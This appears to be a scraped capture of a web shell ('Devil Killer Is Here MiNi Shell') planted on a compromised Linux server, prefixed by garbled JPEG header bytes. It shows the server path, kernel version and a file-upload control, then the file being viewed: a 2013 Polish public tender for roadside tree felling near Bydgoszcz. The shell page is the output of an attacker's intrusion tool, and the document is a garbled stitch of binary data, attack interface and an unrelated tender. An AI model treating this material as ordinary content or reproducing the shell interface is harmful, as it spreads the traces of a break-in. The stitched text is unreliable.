JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/240621-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Usługi w zakresie wycinki drzew przy drogach wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich w Żołędowie w 2013 roku</b><br>
<b>Numer ogłoszenia: 240621 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie wycinki drzew przy drogach wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich w Żołędowie w 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są: 
Usługi w zakresie wycinki drzew przy drogach wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich w Żołędowie w 2013 roku.
 2. Zamówienie obejmuje  wykonanie następujących usług:  
- wycinkę drzew wraz z wywozem dłużycy i ewentualnie gałęzi za zgodą Zamawiającego poza pas drogowy,
- rozdrobnienie gałęzi pozostałych po wycince,
- frezowanie pni zlokalizowanych w koronie drogi na głębokość 15 cm. poniżej uregulowanego poziomu pobocza,
- oczyszczenie terenu po wycince drzew i frezowaniu pni,
- zakup pozyskanego drewna od Zamawiającego zgodnie z wycena rzeczoznawcy.
Wykaz drzew do wycinki:
(Dane Km/str., Gatunek drzewa, Pierśnica, Obwód, Numer drzewa)
Droga wojewódzka nr 207 W. Lubień - Grudziądz	:
- 0+310 P, Lipa drobnolistna, 89, 279, 4;
- 0+540 P, Lipa szerokolistna, 80, 251, 1;
- 0+985 P, Lipa drobnolistna, 87, 273, 2;
- 1+980 P, Lipa drobnolistna, 81, 254, 3;
Droga wojewódzka nr 239 Osie - Warlubie:	
- 10+110 L, Topola, 66,	207, 14;
- 11+370 P,	Topola,	45,	141,	15;
- 11+790 P,	Klon,	75,	236,	16;
- 12+060 P,	Klon,	89,	279,	17;
- 12+240 P,	Klon,	80,	251,	18;
- 12+410 P,	Topola,	85,	267,	19;
- 13+460 L,	Klon,	88,	276,	20;
- 17+560 L,	Topola,	63,	198	21;
- 22+350 P,Dąb,	68,	214,	22;
- 23+060 L,	Dąb,	67,	210,	23;
- 25+804 P, Kasztanowiec,	54,	170,	24;
- 25+900 P,	Kasztanowiec,	73,	229,	25;
- 27+025 L,	Grab,	64,	201,	26;
- 27+668 L,	Grab,	49,	154,	27;
- 28+130 P,	Klon,	65,	204,	28;
- 29+755 P,	Grab,	58,	182,	29;
- 29+765 P,	Grab,	80,	251,	30;
- 31+240 L,	Lipa drobnolistna,	71,	223,	31;
- 32+510 P,	Lipa drobnolistna,	81,	254,	32;
- 31+520 P,	Lipa drobnolistna,	69,	217,	34;
- 32+200 L,	Lipa drobnolistna,	63,	199,	35;
- 32+190 L,	Lipa drobnolistna,	86,	270,	36;
- 32+330 L,	Lipa drobnolistna,	60,	188,	37;
- 32+338 P,	Lipa drobnolistna,	26,	82,	38;
- 32+343 L,	Lipa drobnolistna,	65,	204,	39;
- 32+350 L,	Lipa drobnolistna,	64,	201,	40;
- 32+410 L,	Lipa drobnolistna,	79,	248,	41;
- 33+195 L,	Lipa drobnolistna,	82,	257,	42;
- 33+502 L, Lipa drobnolistna,	74,	232,	43;
Droga wojewódzka nr 240 Chojnice - Świecie:
- 48+390 L,	Topola,	89,	279,	4;
- 48+460 L,	Topola,	66,	207,	3;
- 48+510 L,	Topola,	58,	182,	2;
- 52+060 L,	Topola,	65,	204,	1;
Droga wojewódzka nr 244 Kamieniec - Strzelce Dolne:
- 1+910 P,	Klon,	66,	207,	10;
- 2+050 P,	Klon,	84,	264,	11;
- 2+070 P,	Klon,	60,	188,	12;
- 2+740 P,	Lipa,	55,	173,	13;
- 6+980 P,	Lipa,	50,	157,	14;
- 6+990 P,	Lipa,	35,	110,	15;
- 7+250 L,	Lipa,	100,	314,	16;
- 8+160 L,	Topola,	55,	173,	17;
- 25+250 L,	Klon,	73,	229,	18;
- 35+740 P,	Topola,	96,	301,	19;
- 36+780 P,	Jesion,	30,	94,	20;
Droga wojewódzka nr 248 Zbrachlin - Topolno:
- 1+800 L,	Klon,	56,	175	1;
- 1+830 L,	Klon,	42,	132	2;
- 1+840 L,	Klon,	28,	88	3;
- 3+180 L,	Klon,	63,	198	4;
- 3+190 P,	Jesion,	33,	104,	5;
Droga wojewódzka nr 256 Włóki - Bydgoszcz:
- 4+730 P,	Jesion,	70,	220,	12;
- 4+740 P,	Jesion,	73,	229,	11;
- 4+800 P,	Jesion,	77,	242,	10;
- 4+940 L,	Jesion,	57,	179,	9;
- 4+970 L,	Klon,	44,	138,	8;
- 7+080 L,	Jesion,	69,	217,	7;
- 7+170 P,	Jesion,	53,	166,	6;
- 7+860 L,	Jesion,	58,	182,	5;
- 7+940 L,	Jesion,	46,	144,	4;
- 10+650 P,	Jesion,	72,	226,	3;
- 10+660 L,	Jesion,	96,	301,	2;
- 10+930 P,	Jesion,	36,	113,	1;
Droga wojewódzka nr 272 Laskowice - D. Grupa:
- 1+020 L,	Kasztanowiec,	70,	220	1;
- 1+042 L,	Lipa drobnolistna,100,284,2;
- 1+055 L, Lipa drobnolistna, 85,	258,	3;
- 1+062 L,	Kasztanowiec,	76,	234,	4;
- 1+072 L,	Lipa drobnolistna,	74,	230,	5;
- 1+095 L,	Lipa drobnolistna,	62,	195,	5A;
- 1+620 P,	Lipa drobnolistna,	67,	210,	6;
- 1+650 P,	Lipa drobnolistna	,46,	144,	7;
- 7+780 L,	Miesz. topoli czarnej,	68,	214,	8;
- 8+140 P,	Miesz. topoli czarnej,	63,	198,	9;
- 8+190 P,	Miesz. topoli czarnej,	65,	204,	10;
- 8+220 P,	Miesz. topoli czarnej,	62,	195,	11;
Droga wojewódzka nr 377 Nowe - Pieniążkowo:
- 1+796 L,	Klon,	75,	235,	1;
- 1+830 L,	Klon,	82,	257,	2;
- 3+260 L,	Klon jesionolistny,	86,	270,	3;
- 3+290 L,	Lipa drobnolistna,	65,	204,	4;
- 5+040 P,	Klon,	90,	283,	5;
- 6+630 L,	Topola czarna,	94,	295,	6;
- 6+693 L,	Topola czarna,	101,	317,	7;
- 6+730 L,	Topola czarna,	99,	311,	8;
- 6+750 L,	Topola czarna,	100	,314,	9;
Droga wojewódzka nr 391 Warlubie - Buśnia:
- 1+070 L,	Klon,	62,	195,	1;
- 2+153 P,	Klon,	63,	198,	2;
- 2+147 L,	Klon,	48,	151,	3;
- 2+165 L,	Lipa drobnolistna,	57,	179,	4;
Droga wojewódzka nr 402 Fletnowo - W. Lubień:
- 1+010 P,	Klon,	63,	198,	1;
- 1+012 L,	Klon,	69,	217,	2;
- 1+310 P,	Lipa drobnolistna,	72,	226,	3;
- 1+330 L,	Lipa drobnolistna,	74,	232,	4;
- 1+335 P,	Lipa drobnolistna,	68,	214,	5;
- 1+860 L,	Klon, 	46,	144,	6;
- 2+280 L,	Lipa drobnolistna,	68,	214,	7;
- 2+890 L,	Lipa drobnolistna,	85,	267,	8.

UWAGA: Zamawiający zastrzega sobie prawo zmiany zakresu usługi przez zamianę drzew na inne, niż wymienione w tabeli powyżej.

3. Szczegółowy zakres usług objętych umową określony jest w opisie przedmiotu zamówienia, zestawieniu drzew do wycinki, szczegółowych specyfikacjach technicznych oraz kosztorysie ofertowym stanowiącym załącznik do umowy. 

4. Przedmiot zamówienia został szczegółowo określony w szczegółowych specyfikacjach technicznych związanych z wycinką drzew  nr  D - 00.00.00 Wymagania ogólne, D - 01.02.01 Wycinka drzew..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium, zgodnie z art. 45 ust. 2 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizował a w przypadku świadczeń okresowych lub ciągłych również realizuje zamówienia polegające na wykonaniu usługi w zakresie wycinki drzew o wartości łącznej nie mniejszej niż 50.000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować potencjałem technicznym tj.:
a) piły mechaniczne lub sprzęt równoważny - 6 szt.,
b) podnośnik koszowy lub sprzęt równoważny - 1 szt.,
c) ładowarka lub sprzęt równoważny - 2 szt.,
d) frezarka do frezowania pni lub sprzęt równoważny - 1 szt., 
e) ciągnik o mocy min 75 KM  z napędem na 4 koła lub sprzęt równoważny - 1 szt.,
f) ciągnik z przyczepą lub sprzęt równoważny - 2 szt.,
g) samochód samowyładowczy o ładowności min. 4 Mg lub sprzęt równoważny - 2 szt.;
h) mechaniczna rozdrabniarka do gałęzi lub sprzęt równoważny - 2 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia: 
- 2 osoby posiadające aktualne uprawnienia do zatrzymywania i kierowania ruchem podczas realizacji zamówienia wydanymi przez odpowiedni organ;
- operatorzy sprzętu (w tym 6 pilarzy) wraz z wymaganymi uprawnieniami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą związaną z przedmiotem zamówienia, na kwotę nie mniejszą niż 10 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi, dla których należy przedstawić dowody uznaje się usługi niezbędne do spełnienia warunku, o którym mowa w pkt. V ust. 1.2. tj.  wykonanie usługi w zakresie wycinki drzew o wartości łącznej nie mniejszej niż 50.000 zł brutto w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy wystawienia dokumentów stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze Istotnych Postanowień Umowy będącej załącznikiem nr 9 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu oferty.
2. Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej  w  postaci  aneksu  podpisanego  przez  obie  strony dotyczących w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1.   Zmiana terminu realizacji zamówienia w przypadku: 
a) zlecanie przez Zamawiającego prac dodatkowych jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;  
b) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
2.2. Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu  zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu  zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne. . 
2.3.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
2.4. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.
2.5.	Zmiany wynagrodzenia w przypadku: 
         a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
         b) wzrostu cen wynikających ze zmiany innych niż podatkowe przepisy prawa, jeżeli w wyniku wprowadzenia tych zmian, wykonanie umowy groziłoby Wykonawcy rażącą stratą, a zmiany tej nie można było przewidzieć w chwili zawarcia umowy.
Zaistnienie powyższej okoliczności musi być udokumentowane w sposób wykazujący obiektywną i niezależną od Wykonawcy nadzwyczajną zmianą okoliczności przy czym Zamawiający upoważniony jest do żądania od Wykonawcy stosownych do okoliczności dokumentów.
c) zmian wskazanych w punkcie 2.7. 
2.6. Przekształcenia Wykonawcy będącego osoba prawną lub spółka osobowa lub cywilną w inna spółkę prawa handlowego w trybie przekształcenia spółki zgodnie z przepisami Ustawy Kodeks Spółek Handlowych.
2.7. W związku z możliwą zmianą organizacyjną Zamawiającego w trakcie trwania umowy, w wypadku wprowadzenia w życie stosownym aktem prawnym Województwa Kujawsko-Pomorskiego zmian w zakresie organizacyjno-terytorialnym poszczególnych Rejonów Dróg Wojewódzkich, zmianie może ulec wskazany w punkcie III 5. SIWZ  Wykaz dróg objętych zamówieniem. Zmiana może obejmować numery dróg, kilometraż i długość odcinków. 
3. Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 k.c. - Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.
4.Zmiany regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany.
